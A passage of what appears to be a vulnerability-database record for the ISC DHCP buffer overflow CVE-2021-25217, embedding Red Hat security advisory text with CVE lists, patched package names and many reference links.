nodejs-netmask: improper input validation of octal input data\n(CVE-2021-28918)\n\n* redis: Integer overflow via STRALGO LCS command (CVE-2021-29477)\n\n* redis: Integer overflow via COPY command for large intsets\n(CVE-2021-29478)\n\n* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)\n\n* nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions\n(CVE-2020-28500)\n\n* golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing\n- -u- extension (CVE-2020-28851)\n\n* golang.org/x/text: Panic in language.ParseAcceptLanguage while processing\nbcp47 tag (CVE-2020-28852)\n\n* nodejs-ansi_up: XSS due to insufficient URL sanitization (CVE-2021-3377)\n\n* oras: zip-slip vulnerability via oras-pull (CVE-2021-21272)\n\n* redis: integer overflow when configurable limit for maximum supported\nbulk input size is too big on 32-bit platforms (CVE-2021-21309)\n\n* nodejs-lodash: 
command injection via template (CVE-2021-23337)\n\n* nodejs-hosted-git-info: Regular Expression denial of service via\nshortcutMatch in fromUrl() (CVE-2021-23362)\n\n* browserslist: parsing of invalid queries could result in Regular\nExpression Denial of Service (ReDoS) (CVE-2021-23364)\n\n* nodejs-postcss: Regular expression denial of service during source map\nparsing (CVE-2021-23368)\n\n* nodejs-handlebars: Remote code execution when compiling untrusted compile\ntemplates with strict:true option (CVE-2021-23369)\n\n* nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in\nlib/previous-map.js (CVE-2021-23382)\n\n* nodejs-handlebars: Remote code execution when compiling untrusted compile\ntemplates with compat:true option (CVE-2021-23383)\n\n* openssl: integer overflow in CipherUpdate (CVE-2021-23840)\n\n* openssl: NULL pointer dereference in X509_issuer_and_serial_hash()\n(CVE-2021-23841)\n\n* nodejs-ua-parser-js: ReDoS via malicious User-Agent header\n(CVE-2021-27292)\n\n* grafana: snapshot feature allow an unauthenticated remote attacker to\ntrigger a DoS via a remote API call (CVE-2021-27358)\n\n* nodejs-is-svg: ReDoS via malicious string (CVE-2021-28092)\n\n* nodejs-netmask: incorrectly parses an IP address that has octal integer\nwith invalid character (CVE-2021-29418)\n\n* ulikunitz/xz: Infinite loop in readUvarint allows for denial of service\n(CVE-2021-29482)\n\n* normalize-url: ReDoS for data URLs (CVE-2021-33502)\n\n* nodejs-trim-newlines: ReDoS in .end() method (CVE-2021-33623)\n\n* nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n(CVE-2021-23343)\n\n* html-parse-stringify: Regular Expression DoS (CVE-2021-23346)\n\n* openssl: incorrect SSLv2 rollback protection (CVE-2021-23839)\n\nFor more details about the security issues, including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npages listed in the References section. 
\n\nBugs:\n\n* RFE Make the source code for the endpoint-metrics-operator public (BZ#\n1913444)\n\n* cluster became offline after apiserver health check (BZ# 1942589)\n\n3. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n1913333 - CVE-2020-28851 golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension\n1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag\n1913444 - RFE Make the source code for the endpoint-metrics-operator public\n1921286 - CVE-2021-21272 oras: zip-slip vulnerability via oras-pull\n1927520 - RHACM 2.3.0 images\n1928937 - CVE-2021-23337 nodejs-lodash: command injection via template\n1928954 - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions\n1930294 - CVE-2021-23839 openssl: incorrect SSLv2 rollback protection\n1930310 - CVE-2021-23841 openssl: NULL pointer dereference in X509_issuer_and_serial_hash()\n1930324 - CVE-2021-23840 openssl: integer overflow in CipherUpdate\n1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms\n1936427 - CVE-2021-3377 nodejs-ansi_up: XSS due to insufficient URL sanitization\n1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string\n1940196 - View Resource YAML option shows 404 error when reviewing a Subscription for an application\n1940613 - CVE-2021-27292 nodejs-ua-parser-js: ReDoS via malicious User-Agent header\n1941024 - CVE-2021-27358 grafana: snapshot feature allow an unauthenticated remote attacker to trigger a DoS via a remote API call\n1941675 - CVE-2021-23346 html-parse-stringify: Regular Expression DoS\n1942178 - CVE-2021-21321 fastify-reply-from: crafted URL allows prefix scape of the proxied backend service\n1942182 - CVE-2021-21322 fastify-http-proxy: crafted URL allows 
prefix scape of the proxied backend service\n1942589 - cluster became offline after apiserver health check\n1943208 - CVE-2021-23362 nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl()\n1944822 - CVE-2021-29418 nodejs-netmask: incorrectly parses an IP address that has octal integer with invalid character\n1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data\n1945459 - CVE-2020-28469 nodejs-glob-parent: Regular expression denial of service\n1948761 - CVE-2021-23369 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with strict:true option\n1948763 - CVE-2021-23368 nodejs-postcss: Regular expression denial of service during source map parsing\n1954150 - CVE-2021-23382 nodejs-postcss: ReDoS via getAnnotationURL() and loadAnnotation() in lib/previous-map.js\n1954368 - CVE-2021-29482 ulikunitz/xz: Infinite loop in readUvarint allows for denial of service\n1955619 - CVE-2021-23364 browserslist: parsing of invalid queries could result in Regular Expression Denial of Service (ReDoS)\n1956688 - CVE-2021-23383 nodejs-handlebars: Remote code execution when compiling untrusted compile templates with compat:true option\n1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe\n1957410 - CVE-2021-29477 redis: Integer overflow via STRALGO LCS command\n1957414 - CVE-2021-29478 redis: Integer overflow via COPY command for large intsets\n1964461 - CVE-2021-33502 normalize-url: ReDoS for data URLs\n1966615 - CVE-2021-33623 nodejs-trim-newlines: ReDoS in .end() method\n1968122 - clusterdeployment fails because hiveadmission sc does not have correct permissions\n1972703 - Subctl fails to join cluster, since it cannot auto-generate a valid cluster id\n1983131 - Defragmenting an etcd member doesn\u0027t reduce the DB size (7.5GB) on a setup with ~1000 spoke clusters\n\n5. 8.1) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. 
-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: dhcp security update\nAdvisory ID:       RHSA-2021:2357-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:2357\nIssue date:        2021-06-09\nCVE Names:         CVE-2021-25217\n====================================================================\n1. Summary:\n\nAn update for dhcp is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress. The dhcp packages provide a relay agent and ISC DHCP service\nrequired to enable and administer DHCP on a network. 
\n\nSecurity Fix(es):\n\n* dhcp: stack-based buffer overflow when parsing statements with\ncolon-separated hex digits in config or lease files in dhcpd and dhclient\n(CVE-2021-25217)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1963258 - CVE-2021-25217 dhcp: stack-based buffer overflow when parsing statements with colon-separated hex digits in config or lease files in dhcpd and dhclient\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\ndhcp-4.2.5-83.el7_9.1.src.rpm\n\nx86_64:\ndhclient-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-common-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-libs-4.2.5-83.el7_9.1.i686.rpm\ndhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\ndhcp-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-devel-4.2.5-83.el7_9.1.i686.rpm\ndhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\ndhcp-4.2.5-83.el7_9.1.src.rpm\n\nx86_64:\ndhclient-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-common-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-libs-4.2.5-83.el7_9.1.i686.rpm\ndhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 
7):\n\nx86_64:\ndhcp-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-devel-4.2.5-83.el7_9.1.i686.rpm\ndhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\ndhcp-4.2.5-83.el7_9.1.src.rpm\n\nppc64:\ndhclient-4.2.5-83.el7_9.1.ppc64.rpm\ndhcp-4.2.5-83.el7_9.1.ppc64.rpm\ndhcp-common-4.2.5-83.el7_9.1.ppc64.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.ppc.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.ppc64.rpm\ndhcp-libs-4.2.5-83.el7_9.1.ppc.rpm\ndhcp-libs-4.2.5-83.el7_9.1.ppc64.rpm\n\nppc64le:\ndhclient-4.2.5-83.el7_9.1.ppc64le.rpm\ndhcp-4.2.5-83.el7_9.1.ppc64le.rpm\ndhcp-common-4.2.5-83.el7_9.1.ppc64le.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.ppc64le.rpm\ndhcp-libs-4.2.5-83.el7_9.1.ppc64le.rpm\n\ns390x:\ndhclient-4.2.5-83.el7_9.1.s390x.rpm\ndhcp-4.2.5-83.el7_9.1.s390x.rpm\ndhcp-common-4.2.5-83.el7_9.1.s390x.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.s390.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.s390x.rpm\ndhcp-libs-4.2.5-83.el7_9.1.s390.rpm\ndhcp-libs-4.2.5-83.el7_9.1.s390x.rpm\n\nx86_64:\ndhclient-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-common-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-libs-4.2.5-83.el7_9.1.i686.rpm\ndhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 
7):\n\nppc64:\ndhcp-debuginfo-4.2.5-83.el7_9.1.ppc.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.ppc64.rpm\ndhcp-devel-4.2.5-83.el7_9.1.ppc.rpm\ndhcp-devel-4.2.5-83.el7_9.1.ppc64.rpm\n\nppc64le:\ndhcp-debuginfo-4.2.5-83.el7_9.1.ppc64le.rpm\ndhcp-devel-4.2.5-83.el7_9.1.ppc64le.rpm\n\ns390x:\ndhcp-debuginfo-4.2.5-83.el7_9.1.s390.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.s390x.rpm\ndhcp-devel-4.2.5-83.el7_9.1.s390.rpm\ndhcp-devel-4.2.5-83.el7_9.1.s390x.rpm\n\nx86_64:\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-devel-4.2.5-83.el7_9.1.i686.rpm\ndhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\ndhcp-4.2.5-83.el7_9.1.src.rpm\n\nx86_64:\ndhclient-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-common-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-libs-4.2.5-83.el7_9.1.i686.rpm\ndhcp-libs-4.2.5-83.el7_9.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\ndhcp-debuginfo-4.2.5-83.el7_9.1.i686.rpm\ndhcp-debuginfo-4.2.5-83.el7_9.1.x86_64.rpm\ndhcp-devel-4.2.5-83.el7_9.1.i686.rpm\ndhcp-devel-4.2.5-83.el7_9.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-25217\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. 
\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-25217"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-001741"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25217"
      },
      {
        "db": "PACKETSTORM",
        "id": "163789"
      },
      {
        "db": "PACKETSTORM",
        "id": "163747"
      },
      {
        "db": "PACKETSTORM",
        "id": "163196"
      },
      {
        "db": "PACKETSTORM",
        "id": "163155"
      },
      {
        "db": "PACKETSTORM",
        "id": "163144"
      },
      {
        "db": "PACKETSTORM",
        "id": "163145"
      },
      {
        "db": "PACKETSTORM",
        "id": "163051"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-25217",
        "trust": 3.2
      },
      {
        "db": "SIEMENS",
        "id": "SSA-637483",
        "trust": 1.7
      },
      {
        "db": "SIEMENS",
        "id": "SSA-406691",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/05/26/6",
        "trust": 1.7
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-258-05",
        "trust": 1.5
      },
      {
        "db": "JVN",
        "id": "JVNVU99475301",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU95111565",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-001741",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "163196",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "163051",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2711",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.2508",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2120",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1874",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1935",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2072",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1834",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.4616",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2158",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2320",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2657",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021070616",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021062228",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021122914",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021052708",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021071311",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031109",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021061429",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021060933",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021052902",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021060134",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "163137",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "162840",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "163129",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "163400",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-1759",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-25217",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163789",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163747",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163155",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163144",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163145",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-25217"
      },
      {
        "db": "PACKETSTORM",
        "id": "163789"
      },
      {
        "db": "PACKETSTORM",
        "id": "163747"
      },
      {
        "db": "PACKETSTORM",
        "id": "163196"
      },
      {
        "db": "PACKETSTORM",
        "id": "163155"
      },
      {
        "db": "PACKETSTORM",
        "id": "163144"
      },
      {
        "db": "PACKETSTORM",
        "id": "163145"
      },
      {
        "db": "PACKETSTORM",
        "id": "163051"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-1759"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-001741"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-25217"
      }
    ]
  },
  "id": "VAR-202105-1325",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.366531175
  },
  "last_update_date": "2026-04-10T22:10:16.456000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "ISC\u00a0DHCP\u00a0 buffer overflow vulnerability in",
        "trust": 0.8,
        "url": "https://kb.isc.org/docs/cve-2021-25217"
      },
      {
        "title": "Debian CVElist Bug Report Logs: isc-dhcp: CVE-2021-25217: A buffer overrun in lease file parsing code can be used to exploit a common vulnerability shared by dhcpd and dhclient",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=b55bb445f71f0d88702845d3582e2b5c"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2021-1510",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2021-1510"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2021-1654",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2021-1654"
      },
      {
        "title": "Red Hat: CVE-2021-25217",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2021-25217"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-25217 log"
      },
      {
        "title": "Palo Alto Networks Security Advisory: PAN-SA-2024-0001 Informational Bulletin: Impact of OSS CVEs in PAN-OS",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=palo_alto_networks_security_advisory\u0026qid=34f98e4f4344c97599fe2d33618956a7"
      },
      {
        "title": "Completion for lacework",
        "trust": 0.1,
        "url": "https://github.com/fbreton/lacework "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-25217"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-001741"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-25217"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 1.7,
        "url": "https://kb.isc.org/docs/cve-2021-25217"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2021/05/26/6"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00002.html"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-406691.pdf"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20220325-0011/"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"
      },
      {
        "trust": 1.7,
        "url": "https://security.gentoo.org/glsa/202305-22"
      },
      {
        "trust": 1.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-25217"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/z2lb42jwiv4m4wdnxx5vgip26feywkif/"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5qi4dyc7j4bghew3nh4xhmwthyc36uk4/"
      },
      {
        "trust": 0.9,
        "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-258-05"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnvu95111565"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu99475301/"
      },
      {
        "trust": 0.7,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.7,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/z2lb42jwiv4m4wdnxx5vgip26feywkif/"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5qi4dyc7j4bghew3nh4xhmwthyc36uk4/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163051/red-hat-security-advisory-2021-2357-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031109"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021060933"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.2508"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163137/red-hat-security-advisory-2021-2418-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2657"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021071311"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2711"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021061429"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2320"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163400/red-hat-security-advisory-2021-2555-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2120"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021070616"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021062228"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/isc-dhcp-denial-of-service-via-lease-file-parsing-35555"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163129/red-hat-security-advisory-2021-2405-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021052902"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021122914"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162840/ubuntu-security-notice-usn-4969-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163196/red-hat-security-advisory-2021-2469-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021052708"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.4616"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/6490433"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1874"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1935"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1834"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2158"
      },
      {
        "trust": 0.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-258-05"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/6498095"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021060134"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2072"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-25217"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8286"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-28196"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-15358"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14502"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3520"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13434"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3537"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8231"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33909"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-27219"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3518"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-32399"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-29362"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3516"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13434"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2017-14502"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8285"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-9169"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-29361"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3517"
      },
      {
        "trust": 0.2,
